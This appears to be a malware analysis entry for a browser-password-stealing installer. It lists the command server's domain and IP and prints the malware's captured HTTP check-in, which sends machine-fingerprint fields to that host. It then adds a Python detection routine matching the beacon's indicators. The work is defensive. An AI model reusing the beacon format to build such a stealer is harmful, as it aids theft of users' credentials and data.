Contacted domain
upd.upd4ter.com
Contacted server
93.189.33.108:80
In general, it steals passwords from browsers and collects information about the infected machine (the beacon below carries the fingerprint fields it reports).
GET /installer_stats/?action_id=1003&action_description=Virtual&channel_id=&channel_subid=1&channel_param=0&installer_id=101&installer_version=1.1.9.15182&user_registry=0&user_id=&user_hdd=&user_hdd_volume=&user_mac=&user_mb=&user_bios=&user_os=6.1&user_os_arch=&user_cpu=&user_win_identifier=&process_parent=&user_browsers=&user_default_browser=&user_date=&user_vm=&user_antivirus=s)%20Available.&user_dotnet=&channel=&partner=&aff_id= HTTP/1.1
User-Agent: NSIS_ToolkitOffers (Mozilla)
Host: upd.upd4ter.com
Cache-Control: no-cache
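An added example, not from the original page or the malware's author: it parses the beacon captured above and matches it against the indicators the page lists (host, path, User-Agent prefix, and the installer_stats telemetry keys). The sample request is reconstructed from the page's capture with the query string shortened; the benign request is constructed.

```python
from urllib.parse import urlsplit, parse_qs

# Reconstructed from the capture on this page (query string shortened).
SAMPLE_REQUEST = (
    "GET /installer_stats/?action_id=1003&action_description=Virtual"
    "&installer_id=101&installer_version=1.1.9.15182&user_os=6.1"
    "&user_antivirus=s)%20Available.&aff_id= HTTP/1.1\r\n"
    "User-Agent: NSIS_ToolkitOffers (Mozilla)\r\n"
    "Host: upd.upd4ter.com\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)

# Constructed benign request used to show that the rule does not fire on it.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n"
)

# Indicators quoted from the page.
INDICATORS = {
    "host": "upd.upd4ter.com",
    "path": "/installer_stats/",
    "user_agent_prefix": "NSIS_ToolkitOffers",
    "telemetry_keys": {"installer_id", "installer_version", "user_os"},
}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path, decoded query params and headers."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    parts = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # keep_blank_values keeps the many empty fields the installer sends
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {"method": method, "path": parts.path, "params": params, "headers": headers}


def match_beacon(raw: str) -> list:
    """Return the names of the page's indicators that the request matches."""
    req = parse_request(raw)
    hits = []
    if req["headers"].get("host") == INDICATORS["host"]:
        hits.append("host")
    if req["path"] == INDICATORS["path"]:
        hits.append("path")
    if req["headers"].get("user-agent", "").startswith(INDICATORS["user_agent_prefix"]):
        hits.append("user-agent")
    if INDICATORS["telemetry_keys"] <= req["params"].keys():
        hits.append("installer_stats-telemetry")
    return hits
```

Matching on the host alone is brittle once the domain changes; the User-Agent prefix and the installer_stats field set survive a domain rotation and are the more durable detections here.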
Sample here
Hosting info
http://whois.domaintools.com/93.189.33.108